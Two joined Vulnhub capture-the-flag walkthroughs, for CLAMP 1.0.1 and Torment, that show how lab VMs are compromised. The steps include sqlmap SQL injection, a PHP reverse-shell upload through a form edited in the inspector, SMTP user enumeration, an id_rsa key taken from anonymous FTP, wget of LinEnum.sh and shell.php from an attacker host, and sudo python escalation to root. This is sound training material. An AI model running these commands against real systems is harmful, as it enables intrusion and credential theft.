CLAMP 1.0.1 Vulnhub Walkthrough

In this article, we are going to take a new challenge CLAMP 1.0.1. The credit for making this VM machine goes to “Mehmet Kelepçe” and it’s another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

    Scanning 

    Netdiscover

    Nmap              

    Enumeration

    Web Directory Search

    SQL Injection

    Privilege Escalation

    Abusing Sudo Rights

 

Walkthrough:

Scanning:

Let’s start with the scanning process. This target VM took the IP address of 192.168.1.101 automatically from our local Wi-Fi network.

netdiscover

We have used Nmap for port scanning. Here, you can see that port 22 and 80 are open and both are important to us.

nmap -A 192.168.1.101

As port 80 is open, we will open the IP in our browser as shown below:

Upon opening the IP in the browser, it says “you have found this. But you need more patience” both in English and in Turkish which means we need to find more things. Therefore, further we used DirBuster and we had the following results:

From the result of OWASP DirBuster, the one directory which I found useful is /nt4stopc/. And when you open this directory in the browser you will see the following page:

On this page, it asks you questions in the form of true and false, which here is equivalent of 0 and 1 of binary.

Question	True/False	Bit
Baku is the capital of Turkey?	False	0
The beginning of the French revolution is 1798.	True	1
Istanbul was conquered in 1435?	True	1
Fatih Sultan Mehmet is the founder of Ottoman Empire?	False	0
The founder of the robot science is Al-Cezeri?	True	1
Dennis Ritchie who developed the C language?	True	1
The function definition belongs to the C89 standard?	True	1
The other element of the array is 1?	False	0
Is the maximum 32-but value 2,147,482646?	False	0
Is there an undefined behaviour in the following code?	True	1

So, if you keep answering these questions you will have ‘0110111001’ binary string. Now add that binary string after the name of the directory as shown below:

Once the above step is done, the page that opens will show a message saying “I think you need a vacation. Don’t worry, I’m directing” again both in English and Turkish. This page then redirects to a webpage showing turkey as a holiday spot as shown in the image below:

This link is vulnerable to SQL injection. We found this by simply adding ‘after id=1. And our doubt was confirmed when an error was returned.

So, to exploit SQL’s vulnerability we will use sqlmap and following will be the command:

sqlmap -u http://192.168.1.101/nt4stopc/011011101/sumertimesummertime/go.php?id=1 –dbs --batch

Executing the above command will provide the following result. And that’s how we got the database name i.e. tatil as shown in the image below:

In the database, we found a string of Caesar Encryption which will lead us to upload our malware.

We decrypted the encrypted string online and it was the 13^th formula of the encryption as shown in the image below:

When we add this decrypted string to the URL we are redirected to the following page:

Then we opened the upload.php page to upload our malware where we found an option to browse our malware but the problem is that there is no submit button as you can see in the following image:

So firstly, we will make changes of IP and port in the php shell so that we can have the session. The changes that we made can be seen in the following image:

Now, you can browse the shell and select it.

Once the previous step is completed, it will pop a message for you telling you to try again. Now that we don’t have a submit button, it will seem like one is stuck in a pickle. But there is a simple solution to it. Right-click on the page and select ‘Inspect Element’ a window will open, from this window click on the form tag. Here, add the following line:

Doing the above changes will provide you with a ‘submit query’ button and it this button that will let us upload your shell.

Now, once the file is upload, it will show you the message that ‘The file osas/md5(php-reverse-shell.php.php has been uploaded’. Here, please observe that the shell is being uploaded in md5 hash.

So, we calculated the md5 hash of the name of the file with the following command:

echo -n “php-reverse-shell.php” | md5 sum

Then turn on the netcat using the following command:

nc -lvp 1234

And once the is executed, you will have your session. Now with the help of further enumeration, we found important.pcapng.

Now let us download the file to inspect it. To download the file simply add its name to URL and press enter

As this file is in pcapng format, open the file in Wireshark. Now if you follow the TCP Stream of the HTTP request packet, you will find password there. That too in cleartext.

Now that we have the password, we can directly login using SSH with the following command:

ssh mkelepc@192.168.1.101

Once you are logged on, go into the root directory, there you will find a flag. When you read the flag, it says that the challenges are done.

Hurray! Another CTF solved. This is a great lab with a strong focus on enumeration.

digitalworld.local:Torment Vulnhub Walkthrough

Hello guys today we are going to take a new challenge Torment, which is a lab of the series digitalworld. The credit for making this VM machine goes to “Donavan” and it’s another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

1.      Scanning

·         Netdiscover

·         NMAP

2.      Enumeration

·         FTP

·         HexChat

·         LinEnum.sh

3.      Exploitation

·         Metasploit

·         Netcat

4.      Privilege Escalation

·         Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start of by scanning the network and identifying host IP address. We can identify our host IP as 192.168.1.105 by using Netdiscover.

netdiscover

Then as usual we used our favorite tool Nmap for port enumeration. We found that there are so many ports open on the target machine.

We have ports like 21, 22 open.

nmap  -A 192.168.1.105

Other important ports open on the system are 25, 80, 445, 631, 2049 and 6667.

Enumeration:

As we can see port 21 is open with Anonymous login enabled. So we logged into the system and found there are multiple directories but ngircd and .ssh caught our attention.

ngircd is a free, portable and lightweight Internet Relay Chat server for small or private networks. .ssh is a directory which holds the id_rsa_keys for SSH authentication.

ftp 192.168.1.105

ls -la

We looked inside the .ngircd directory and there was a file named channels, we downloaded the file into our kali system.

Likewise we downloaded id_rsa file from the .ssh directory.

cd .ngircd

ls

get channels

cd .ssh

get id_rsa

We looked inside the channels directory and found two channels named games & tormentedprinter.

We also looked inside the id_rsa file and got a private key which could be used for SSH login into the target system.

cat channels

cat id_rsa

As already explained above that there is ngircd chat service running. We tried to access the target system using HexChat.

We entered the target host ip address but we don’t have the password to login.

So what we did is we installed the ngircd on our kali system only to look for the default password of ngircd chat service.

In the /etc/ngircd file we looked for the default credentials.

We got a password wealllikedebian.

We used the default password in our HexChat messenger to connect to the target machine.

After connecting, it asked to join the channel and if you remember we have already two channel names games & tormentedprinter with us. We used both and the later had some important information for us.

After logging in we found a password mostmachineshaveasupersecurekeyandalongpassphrasell which we may be used later.

There is a CUPS 2.2.1 service running on port 661 and can be access through http-method as shown by the nmap scan.

We tried to access the same port in the browser.

Looking here and there in search of some info. In printers tab we got some names which we though can be used to form a username list.

We created a users file in which we copied all the names found above.

Exploitation:

From the nmap scan you might have observed that there is Postfix smtp service running on port 25. We looked for its exploit and its vulnerable to user brute forcing.

We passed in the above created users file for brute forcing and found two legitimate users Patrick, Qiu.

use auxiliary/scanner/smtp/smtp_enum

set rhosts 192.168.1.105

set user_file /root/users

exploit

So we have a username and a private ssh key which we can use to log in to the target system.

We logged into the system with user Patrick and checked for the sudoer’s list but didn’t find any such binary which can lead us to privilege escalation.

chmod 600 id_rsa

ssh -i id_rsa patrick@192.168.1.105

sudo -l

So to further enumerate we thought of using LinEnum.sh, so we downloaded the LinEnum.sh on the target machine using wget command.

But unfortunately couldn’t find anything useful.

cd /tmp

wget http://192.168.1.106:8000/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh

Privilege Escalation:

So after lot of enumeration and scratching here and there we found that the apache2.conf of the apache service has read write and execute permissions for all the users.

So what we did is we tried to edit the same file.

ls -la /etc/apache2/apache2.conf

nano /etc/apache2/apache2.conf

We added a user qiu and group qiu inside the /etc/apache2/apache2.conf so that we will leverage it for privilege escalation. So the idea is when we restart the apache service it will get executed with qiu user privileges.

Parallelly we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the listener IP as ours and named it as shell.php.

cd /usr/share/website/php

ls -la

cp php-reverse-shell.php /root/shell.php

nano shell.php

We edited the listener’s ip as ours.

Then downloaded the shell into /var/www/html folder so that we can access it through browser.

To make the apache service run as qiu user we have to restart the apache service but we don’t have the privileges to do so, but at the same time we can reboot the target system as reboot command can be executed as sudoer for the user Patrick.

cd /var/www/html

wget http://192.168.1.106:8000/shell.php

sudo /bin/systemctl reboot

After reboot is complete we just executed the shell.php script in the browser and at the same time started a netcat listener on our kali.

After some time we got a reverse netcat shell on our kali system of user qiu.

To elevate to the root shell we checked for the sudoer list and found that python can be run with root privileges without any password. So after executing the python one liner /bin/bash script with sudo permissions we successfully got the root shell.

nc -lvp 1234

python -c 'import pty;pty.spawn("/bin/sh")'

sudo -l

sudo python -c 'import pty;pty.spawn("/bin/sh")'

id

Once you have got the root shell get the root flag is like a cake walk which we eventually did and got the two flags proof.txt and author-secret.txt.

ls

cat proof.txt

cat author-secret.txt